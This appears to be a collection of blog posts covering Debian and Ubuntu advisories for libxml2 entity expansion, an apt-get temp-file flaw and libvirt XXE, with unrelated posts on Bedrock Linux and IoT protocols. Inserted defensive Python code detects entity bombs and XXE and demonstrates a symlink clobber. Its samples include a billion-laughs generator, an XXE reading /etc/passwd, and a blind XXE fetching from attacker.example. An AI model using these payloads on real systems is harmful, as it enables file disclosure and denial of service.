Denial of Service Flaw in libxml2

Debian Linux Security Advisory 3057-1: Sogeti found a denial of service flaw (CVE-2014-3660) in libxml2, a library providing support to read, modify and write XML and HTML files. A remote attacker could provide a specially crafted XML file that, when processed by an application using libxml2, would lead to excessive CPU consumption (denial of service) based on excessive entity substitutions, even if entity substitution was disabled.

Entity Substitution

Entities in principle are similar to simple C macros. An entity defines an abbreviation for a given string that you can reuse many times throughout the content of your document. Entities are especially useful when a given string may occur frequently within a document, or to confine the change needed to a document to a restricted area in the internal subset of the document (at the beginning). Example:

1 <?xml version="1.0"?>
2 <!DOCTYPE EXAMPLE SYSTEM "example.dtd" [
3 <!ENTITY xml "Extensible Markup Language">
4 ]>
5 <EXAMPLE>
6    &xml;
7 </EXAMPLE>

Line 3 declares the xml entity. Line 6 uses the xml entity, by prefixing its name with ‘&’ and following it with ‘;’ without any spaces added. XML defines 5 predefined entities, which libxml2 knows without any declaration, allowing you to escape characters that have a special meaning in some parts of the XML document content: &lt; for the character ‘<’, &gt; for the character ‘>’, &apos; for the character ‘'’, &quot; for the character ‘"’, and &amp; for the character ‘&’.

One of the problems related to entities is that you may want the parser to substitute an entity’s content so that you can see the replacement text in your application. Or you may prefer to keep entity references as such in the content, to be able to save the document back without losing this usually precious information (if the user went through the pain of explicitly defining entities, they may take it rather badly if you blindly substitute them to save time). The xmlSubstituteEntitiesDefault() function allows you to check and change the behaviour, which by default is to not substitute entities; the same choice is made per parse with the XML_PARSE_NOENT parser option, which is what xmllint’s --noent flag sets.

Here is the DOM tree built by libxml2 for the previous document in the default case:

/gnome/src/gnome-xml -> ./xmllint --debug test/ent1
DOCUMENT
version=1.0
   ELEMENT EXAMPLE
     TEXT
     content=
     ENTITY_REF
       INTERNAL_GENERAL_ENTITY xml
       content=Extensible Markup Language
     TEXT
     content=

And here is the result when substituting entities:

/gnome/src/gnome-xml -> ./tester --debug --noent test/ent1
DOCUMENT
version=1.0
   ELEMENT EXAMPLE
     TEXT
     content=     Extensible Markup Language
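The advisory at the top of the page is about what happens when entity substitution is turned against the parser: a few declarations in the internal subset can describe a document that expands to gigabytes. The following is an added example, not libxml2 code: a pre-parse estimator in plain Python that reads the internal subset, computes how large each entity would become once fully expanded (memoised, so it never actually expands anything), and refuses the document when the total passes a budget or an entity refers back to itself. It is run on the tutorial document above and on a constructed "billion laughs" bomb; the entity and DOCTYPE patterns, the 10,000,000-character budget and the sample documents are the example's own assumptions, and it deliberately ignores external and parameter entities.

```python
import re

# Lexical helpers for the internal DTD subset (the text between "[" and "]>").
DOCTYPE_SUBSET = re.compile(r'<!DOCTYPE[^\[>]*\[(.*?)\]\s*>', re.S)
ENTITY_DECL = re.compile(r'<!ENTITY\s+([\w.:-]+)\s+(?:"([^"]*)"|\'([^\']*)\')\s*>')
ENTITY_REF = re.compile(r'&([\w.:-]+);')
# XML's five predefined entities each expand to exactly one character.
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "apos": 1, "quot": 1}


class EntityBomb(ValueError):
    """The document would exceed the expansion budget, or its entities recurse."""


def internal_entities(doc):
    """Map name -> replacement text for each internal general entity in the
    DOCTYPE's internal subset. Parameter entities (% name) and external
    entities (SYSTEM/PUBLIC) do not match the pattern and are left out."""
    m = DOCTYPE_SUBSET.search(doc)
    if not m:
        return {}
    return {name: dq or sq for name, dq, sq in ENTITY_DECL.findall(m.group(1))}


def expanded_size(name, entities, budget, memo=None, stack=()):
    """Number of characters &name; produces once fully expanded.

    Each entity's size is memoised, so a nested bomb costs one visit per
    declaration instead of the exponential number of copies it describes, and
    the running total is checked after every reference so it never gets far
    past the budget."""
    if memo is None:
        memo = {}
    if name in PREDEFINED:
        return PREDEFINED[name]
    if name in memo:
        return memo[name]
    if name in stack:
        raise EntityBomb("recursive entity: " + " -> ".join(stack + (name,)))
    if name not in entities:
        raise ValueError(f"reference to undeclared entity '{name}'")
    text = entities[name]
    size = len(ENTITY_REF.sub("", text))  # literal characters of the replacement text
    for ref in ENTITY_REF.finditer(text):
        size += expanded_size(ref.group(1), entities, budget, memo, stack + (name,))
        if size > budget:
            raise EntityBomb(f"'{name}' expands past {budget} characters")
    memo[name] = size
    return size


def expanded_body_size(doc, budget=10_000_000):
    """Characters the body (everything after the DOCTYPE) would occupy once
    every entity reference is substituted. Raises EntityBomb when the budget
    is exceeded or an entity refers to itself."""
    entities = internal_entities(doc)
    m = DOCTYPE_SUBSET.search(doc)
    body = doc[m.end():] if m else doc
    memo = {}
    size = len(ENTITY_REF.sub("", body))
    for ref in ENTITY_REF.finditer(body):
        size += expanded_size(ref.group(1), entities, budget, memo)
        if size > budget:
            raise EntityBomb(f"document expands past {budget} characters")
    return size


def is_entity_bomb(doc, budget=10_000_000):
    """True when the document should be refused before any parser sees it."""
    try:
        expanded_body_size(doc, budget)
    except EntityBomb:
        return True
    return False


# Constructed sample: the tutorial document above, as a string.
PAGE_DOC = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE EXAMPLE SYSTEM "example.dtd" [\n'
    '<!ENTITY xml "Extensible Markup Language">\n'
    ']>\n'
    '<EXAMPLE>\n'
    '   &xml;\n'
    '</EXAMPLE>\n'
)

# Constructed sample: two entities that reference each other.
RECURSIVE_DOC = '<!DOCTYPE r [\n<!ENTITY a "&b;">\n<!ENTITY b "&a;">\n]>\n<r>&a;</r>\n'


def billion_laughs(depth=9, fanout=10):
    """Constructed entity bomb: lol<depth> expands to fanout**depth copies of 'lol'."""
    decls = ['<!ENTITY lol "lol">']
    for n in range(1, depth + 1):
        prev = "lol" if n == 1 else f"lol{n - 1}"
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{n} "{refs}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f'\n]>\n<lolz>&lol{depth};</lolz>\n')


if __name__ == "__main__":
    print("tutorial document expands to", expanded_body_size(PAGE_DOC), "characters")
    for sample in (billion_laughs(), RECURSIVE_DOC):
        try:
            expanded_body_size(sample)
        except EntityBomb as err:
            print("rejected:", err)
```

Because the check runs on the raw text before any parser sees it, it does not matter whether the application later parses with or without XML_PARSE_NOENT, which is exactly the situation the advisory describes. libxml2 also applies its own expansion limits, which the XML_PARSE_HUGE option relaxes; keep that option off for untrusted input.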

Bedrock Linux & Poettering’s New Suggestion!

Bedrock Linux is a Linux distribution created with the aim of making most of the (often seemingly mutually-exclusive) benefits of various other Linux distributions available simultaneously and transparently.

If one would like a rock-solid stable base (for example, from Debian or a RHEL clone) yet still have easy access to cutting-edge packages (from, say, Arch Linux), automate compiling packages with Gentoo’s portage, and ensure that software aimed only for the ever popular Ubuntu will run smoothly – all at the same time, in the same distribution – Bedrock Linux will provide a means to achieve this. ~ http://bedrocklinux.org/

Lennart Poettering has caused a big stir in the Linux world with systemd. Now he has suggested a new way of building distros and getting code into users’ hands, and it is all based on the btrfs file system.

The idea is to use the filesystem versioning feature of btrfs to distribute everything from individual packages to entire operating systems (good for server and embedded systems), i.e. two files with the same name can exist in the same directory, just under different versions of the filesystem. It would then be possible to mix-and-match, even at run-time. If I understand it right, you could even install two operating systems and natively run executables that rely on either of them without rebooting.

It sounds a lot like Bedrock Linux …!!

But fundamental differences that you can notice are:

  • Bedrock Linux lets you use software straight from an upstream distro. If there’s some distro that provides something, you can use it now, while this proposal requires people make special packages for it. If people have to make special packages, I’m not sure I see the benefit of this over something like Nix… Bedrock Linux was largely created specifically because things like Nix don’t have enough packages.
  • Bedrock Linux intends to be very flexible in terms of what it imposes on the end-user. This seems to have a hard requirement on a btrfs feature. If btrfs isn’t performant in a specific area you like, isn’t stable enough yet, etc., this isn’t a viable solution for you. Moreover it is a bit worrying to tie things that tightly to a specific technology, as it may make things harder to replace down the road. What if someone comes up with some fancy new filesystem that is better in other ways but doesn’t have this feature?
  • Bedrock Linux groups things together by shared libraries so that if there’s a security issue, you only need to update a handful of files managed by presumably trusted upstream distros. With this, security updates fall back to the individual package maintainer; it feels like a rather large step backwards in terms of security from how Linux traditionally works.
  • Bedrock Linux “fixes” the problem of letting users use software that wasn’t aimed at their specific distro only for users of Bedrock Linux. What Bedrock Linux is doing doesn’t really help people on other distros. This proposal could “fix” it in general if developers target it.
  • Bedrock Linux’s ability to run software from other distros means the software it runs wasn’t actually intended to run in this configuration, and an update could, in theory, break it. There is a lot of effort and hopefully smart design to avoid this, but it is still at least in theory possible. The software aimed at this proposal will know its situation and be less likely to run into this problem.

While on the surface this seems a lot like Bedrock Linux, this proposal seems functionally closer to Nix. It has a similar restriction on requiring special packages for it and similarly “fixes” the problem from the point of view of the packager.

IoT/M2M protocols

IoT/M2M development can be complex due to the large number of communication protocols used in today’s industries. There are too many protocols to master for building an end-to-end IoT/M2M solution. MQTT, CoAP and OMA LWM2M (Lightweight M2M) are well adopted in recent M2M development. Between them, these protocols cover the requirements of the data transport, application and device management layers.

MQ Telemetry Transport (MQTT) is a lightweight broker-based publish/subscribe messaging protocol designed for low-bandwidth or unreliable networks and for embedded devices with limited processor or memory resources.

CoAP is the Constrained Application Protocol from the IETF CoRE (Constrained RESTful Environments) working group. Similar to HTTP, CoAP is a document transfer protocol (URI scheme coap://).

OMA LightweightM2M (LWM2M) is an industry standard for device management of M2M/IoT devices. It relies heavily on CoAP and is therefore optimized for communication over sensor or cellular networks. OMA LWM2M provides an extensible object model that allows application data exchanges in addition to the core device management features (firmware upgrade, connectivity monitoring).

Upgrade your apt-get!

Guillem Jover discovered that the changelog retrieval functionality in
apt-get used temporary files in an insecure way, allowing a local user
to cause arbitrary files to be overwritten.

This vulnerability is neutralized by the fs.protected_symlinks setting in
the Linux kernel, which is enabled by default in Debian 7 Wheezy and up.

For the stable distribution (wheezy), this problem has been fixed in
version 0.9.7.9+deb7u6.

For the unstable distribution (sid), this problem has been fixed in
version 1.0.9.2.

It is recommended that you upgrade your apt packages.
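The apt-get bug above is an instance of the classic insecure temporary file: a predictable name is opened for writing without O_EXCL, so a local attacker who plants a symlink at that name beforehand gets the victim's write redirected onto any file the victim can write. The following is an added demonstration, not apt code, and the temporary-file name it uses is hypothetical: it stages the attack inside a private directory, shows the insecure opener clobbering the target, then shows the two usual fixes (O_CREAT|O_EXCL on the same path, and tempfile.mkstemp) refusing or avoiding the planted link. It also reads the fs.protected_symlinks knob the advisory mentions.

```python
import os
import tempfile

ORIGINAL = "original contents\n"   # constructed: what the target file held
PAYLOAD = "changelog text\n"       # constructed: what the victim writes to its temp file


def write_predictable_tmp(path, data):
    """Insecure pattern: a fixed, guessable name opened with O_CREAT but without
    O_EXCL, so whatever already sits at `path` (a planted symlink) is followed."""
    with open(path, "w") as f:
        f.write(data)


def write_exclusive_tmp(path, data):
    """Hardened: O_CREAT|O_EXCL makes open() fail if `path` exists at all,
    including when it is a symlink, wherever that symlink points."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def write_mkstemp(dirpath, data):
    """Hardened: mkstemp picks an unpredictable name and opens it with O_EXCL
    itself, so there is no name for an attacker to pre-create."""
    fd, path = tempfile.mkstemp(prefix="changelog-", dir=dirpath)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def _read(path):
    with open(path) as f:
        return f.read()


def simulate_symlink_attack():
    """Stage the race in a private directory: the attacker plants a symlink at
    the name the victim is about to use, pointing at a file the victim can
    write (a stand-in for a system file). Returns what happened to that file."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "victim-file")
        with open(target, "w") as f:
            f.write(ORIGINAL)
        # Hypothetical predictable name; apt's real path is not reproduced here.
        planted = os.path.join(d, "apt-changelog.tmp")
        os.symlink(target, planted)

        write_predictable_tmp(planted, PAYLOAD)
        insecure_clobbered = _read(target) == PAYLOAD

        with open(target, "w") as f:        # restore, then retry the hardened opener
            f.write(ORIGINAL)
        try:
            write_exclusive_tmp(planted, PAYLOAD)
            exclusive_refused = False
        except FileExistsError:
            exclusive_refused = True
        target_intact = _read(target) == ORIGINAL

        safe_path = write_mkstemp(d, PAYLOAD)
        mkstemp_made_new_file = (not os.path.islink(safe_path)
                                 and not os.path.samefile(safe_path, target))
        return {
            "insecure_clobbered": insecure_clobbered,
            "exclusive_refused": exclusive_refused,
            "target_intact": target_intact,
            "mkstemp_made_new_file": mkstemp_made_new_file,
        }


def protected_symlinks_enabled():
    """Read the kernel knob named in the advisory; None when it is not exposed
    (non-Linux host or restricted /proc)."""
    try:
        with open("/proc/sys/fs/protected_symlinks") as f:
            return f.read().strip() == "1"
    except OSError:
        return None


if __name__ == "__main__":
    print(simulate_symlink_attack())
    print("fs.protected_symlinks:", protected_symlinks_enabled())
```

Note that fs.protected_symlinks only covers symlinks in world-writable sticky directories such as /tmp, and only when the process following the link is neither the link's owner nor the directory's owner; that is why the private directory used in the demonstration is not protected by it, and why the fix in apt itself is needed regardless of the kernel setting.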

libvirt Vulnerabilities

libvirt is an open source API, daemon and management tool for managing platform virtualization. It can be used to manage KVM, Xen, VMware ESX, QEMU and other virtualization technologies. These APIs are widely used by the orchestration layer of cloud platforms to drive hypervisors.

Some of the major libvirt features are:

  • VM management: various domain lifecycle operations such as start, stop, pause, save, restore, and migrate.
  • Remote machine support: all libvirt functionality is accessible on any machine running the libvirt daemon, including remote machines.
  • Storage management: any host running the libvirt daemon can be used to manage various types of storage: create file images of various formats (qcow2, vmdk, raw, …), mount NFS shares, enumerate existing LVM volume groups, create new LVM volume groups and logical volumes, partition raw disk devices, etc.
  • Network interface management: any host running the libvirt daemon can be used to manage physical and logical network interfaces.
  • Virtual NAT and route-based networking: any host running the libvirt daemon can manage and create virtual networks.

Daniel P. Berrange and Richard Jones discovered that libvirt incorrectly
handled XML documents containing XML external entity declarations. An
attacker could use this issue to cause libvirtd to crash, resulting in a
denial of service on all affected releases, or possibly read arbitrary
files if fine grained access control was enabled on Ubuntu 14.04 LTS.
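An XML external entity declaration lets a document tell the parser to pull its replacement text from a URI, so a client that can submit XML to libvirtd can ask the daemon to embed a local file, or to fetch a DTD from the network, under the daemon's privileges. The following added example (not libvirt code) is a gate a privileged service can run on untrusted XML before parsing it: it reads the DOCTYPE and reports any external DTD subset, any SYSTEM/PUBLIC entity (general or parameter), and any parameter-entity reference, while letting ordinary internal entities through. The domain documents and payloads are constructed samples, not the reporters' test cases, and the regular expressions are the example's own simplification of the DTD grammar.

```python
import re

# The DOCTYPE declaration: root name, optional external subset, optional internal subset.
DOCTYPE = re.compile(
    r'<!DOCTYPE\s+[^\s\[>]+'
    r'(?P<external>\s+(?:SYSTEM|PUBLIC)[^\[>]*)?'
    r'\s*(?:\[(?P<subset>.*?)\])?\s*>', re.S)
# An entity (general or parameter) whose replacement text comes from a URI.
EXTERNAL_ENTITY = re.compile(
    r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.:-]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+(?P<pq>["\'])[^"\']*(?P=pq))\s+'
    r'(?P<q>["\'])(?P<uri>.*?)(?P=q)', re.S)
# A parameter-entity reference (%name;) inside the internal subset.
PARAM_REF = re.compile(r'%[\w.:-]+;')


def dtd_findings(doc):
    """Reasons the DOCTYPE could make a parser fetch or embed external content.
    Empty when there is no DOCTYPE or it only declares internal general entities."""
    findings = []
    m = DOCTYPE.search(doc)
    if not m:
        return findings
    if m.group("external"):
        findings.append("external DTD subset:" + m.group("external").rstrip())
    subset = m.group("subset") or ""
    for e in EXTERNAL_ENTITY.finditer(subset):
        kind = "parameter" if e.group("param") else "general"
        findings.append(f"external {kind} entity '{e.group('name')}' -> {e.group('uri')}")
    for r in PARAM_REF.finditer(subset):
        findings.append(f"parameter entity reference {r.group(0)} in internal subset")
    return findings


def is_safe_xml(doc, allow_doctype=True):
    """Gate for untrusted XML. With allow_doctype=False any DOCTYPE at all is
    refused, which is the right policy for formats that never need one."""
    if not allow_doctype and DOCTYPE.search(doc):
        return False
    return not dtd_findings(doc)


# Constructed samples: libvirt's domain XML is the format in the advisory; the
# payloads are the generic XXE patterns, not the reporters' test documents.
CLEAN_DOMAIN = '<domain type="kvm"><name>vm1</name></domain>\n'
INTERNAL_ONLY = ('<!DOCTYPE domain [<!ENTITY n "vm1">]>\n'
                 '<domain type="kvm"><name>&n;</name></domain>\n')
XXE_DOMAIN = ('<?xml version="1.0"?>\n'
              '<!DOCTYPE domain [\n'
              '  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
              ']>\n'
              '<domain type="kvm">\n  <name>&xxe;</name>\n</domain>\n')
BLIND_XXE = ('<!DOCTYPE domain [\n'
             '  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">\n'
             '  %dtd;\n'
             ']>\n<domain/>\n')
EXTERNAL_SUBSET = '<!DOCTYPE domain SYSTEM "domain.dtd">\n<domain/>\n'


if __name__ == "__main__":
    for label, sample in [("clean", CLEAN_DOMAIN), ("internal entity", INTERNAL_ONLY),
                          ("xxe", XXE_DOMAIN), ("blind xxe", BLIND_XXE),
                          ("external subset", EXTERNAL_SUBSET)]:
        print(f"{label:16} safe={is_safe_xml(sample)} {dtd_findings(sample)}")
```

The gate complements, rather than replaces, configuring libxml2 itself: parse untrusted input without XML_PARSE_NOENT and XML_PARSE_DTDLOAD and with XML_PARSE_NONET set, and refuse documents that carry a DOCTYPE outright (allow_doctype=False) when the format never needs one.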

Luyao Huang discovered that libvirt incorrectly handled certain blkiotune
queries. An attacker could use this issue to cause libvirtd to crash,
resulting in a denial of service. This issue only applied to Ubuntu 12.04
LTS and Ubuntu 14.04 LTS.

You are using libvirt if you manage virtual machines using virsh, virt-manager, or virt-install (pretty much any virtualization tool that starts with virt-*). If you are using hypervisor-specific tools like ‘xm’, ‘qemu-kvm’, etc. directly, you probably are not using libvirt. If you have virtual machines on your existing machine and you are using libvirt, ‘virsh list --all’ (usually run as root) should show something.

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 LTS:
libvirt0 1.2.2-0ubuntu13.1.5
libvirt-bin 1.2.2-0ubuntu13.1.5
Ubuntu 12.04 LTS:
libvirt0 0.9.8-2ubuntu17.20
libvirt-bin 0.9.8-2ubuntu17.20
Ubuntu 10.04 LTS:
libvirt0 0.7.5-5ubuntu27.25
libvirt-bin 0.7.5-5ubuntu27.25